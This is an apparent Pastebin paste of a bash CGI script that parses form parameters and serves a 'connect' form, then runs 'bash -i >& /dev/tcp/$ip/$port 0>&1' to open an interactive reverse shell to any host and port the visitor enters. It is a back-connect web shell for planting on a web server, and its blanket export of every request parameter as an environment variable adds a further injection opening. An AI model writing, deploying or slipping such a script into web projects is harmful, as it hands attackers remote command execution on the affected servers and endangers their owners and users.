Advertisement
simaosec

Untitled

Sep 14th, 2017
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.16 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. function cgi_get_POST_vars()
  4. {
  5.  
  6. [ "$REQUEST_METHOD" != "POST" ] && return
  7.  
  8.  
  9. [ ! -z "$QUERY_STRING_POST" ] && return
  10.  
  11.  
  12. [ -z "$CONTENT_LENGTH" ] && return
  13.  
  14.  
  15.  
  16. [ "${CONTENT_TYPE}" != "application/x-www-form-urlencoded" ] && \
  17. echo "bash.cgi warning: you should probably use MIME type "\
  18. "application/x-www-form-urlencoded!" 1>&2
  19.  
  20.  
  21. local handlemultipart=0 # enable to handle multipart/form-data (dangerous?)
  22. if [ "$handlemultipart" = "1" -a "${CONTENT_TYPE:0:19}" = "multipart/form-data" ]; then
  23. boundary=${CONTENT_TYPE:30}
  24. read -N $CONTENT_LENGTH RECEIVED_POST
  25.  
  26. QUERY_STRING_POST=$(echo "$RECEIVED_POST" | awk -v b=$boundary 'BEGIN { RS=b"\r\n"; FS="\r\n"; ORS="&" }
  27. $1 ~ /^Content-Disposition/ {gsub(/Content-Disposition: form-data; name=/, "", $1); gsub("\"", "", $1); print $1"="$3 }')
  28.  
  29. # take input string as is
  30. else
  31. read -N $CONTENT_LENGTH QUERY_STRING_POST
  32. fi
  33.  
  34. return
  35. }
  36.  
  37. # (internal) routine to decode urlencoded strings
  38. function cgi_decodevar()
  39. {
  40. [ $# -ne 1 ] && return
  41. local v t h
  42. # replace all + with whitespace and append %%
  43. t="${1//+/ }%%"
  44. while [ ${#t} -gt 0 -a "${t}" != "%" ]; do
  45. v="${v}${t%%\%*}" # digest up to the first %
  46. t="${t#*%}" # remove digested part
  47. # decode if there is anything to decode and if not at end of string
  48. if [ ${#t} -gt 0 -a "${t}" != "%" ]; then
  49. h=${t:0:2} # save first two chars
  50. t="${t:2}" # remove these
  51. v="${v}"`echo -e \\\\x${h}` # convert hex to special char
  52. fi
  53. done
  54. # return decoded string
  55. echo "${v}"
  56. return
  57. }
  58.  
  59.  
  60. function cgi_getvars()
  61. {
  62. [ $# -lt 2 ] && return
  63. local q p k v s
  64. # get query
  65. case $1 in
  66. GET)
  67. [ ! -z "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
  68. ;;
  69. POST)
  70. cgi_get_POST_vars
  71. [ ! -z "${QUERY_STRING_POST}" ] && q="${QUERY_STRING_POST}&"
  72. ;;
  73. BOTH)
  74. [ ! -z "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
  75. cgi_get_POST_vars
  76. [ ! -z "${QUERY_STRING_POST}" ] && q="${q}${QUERY_STRING_POST}&"
  77. ;;
  78. esac
  79. shift
  80. s=" $* "
  81.  
  82. while [ ! -z "$q" ]; do
  83. p="${q%%&*}" # get first part of query string
  84. k="${p%%=*}" # get the key (variable name) from it
  85. v="${p#*=}" # get the value from it
  86. q="${q#$p&*}" # strip first part from query string
  87. # decode and assign variable if requested
  88. [ "$1" = "ALL" -o "${s/ $k /}" != "$s" ] && \
  89. export "$k"="`cgi_decodevar \"$v\"`"
  90. done
  91. return
  92. }
  93.  
  94. echo "Content-type: text/html";
  95. echo '';
  96. cgi_getvars BOTH ALL
  97. echo "<html> <center> <form action='' method='POST'> <input type=text name=ip value=$REMOTE_ADDR> <input type=text name=port value=21> <input type="hidden" name="cc2" value="8" /><br> <input type=submit name=run value=connect> <font color=red>"
  98.  
  99.  
  100.  
  101.  
  102. echo "</font><center></html>";
  103. if [ $cc2 -eq 8 ] ; then
  104. bash -i >& /dev/tcp/$ip/$port 0>&1
  105. fi
  106. echo $ip
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement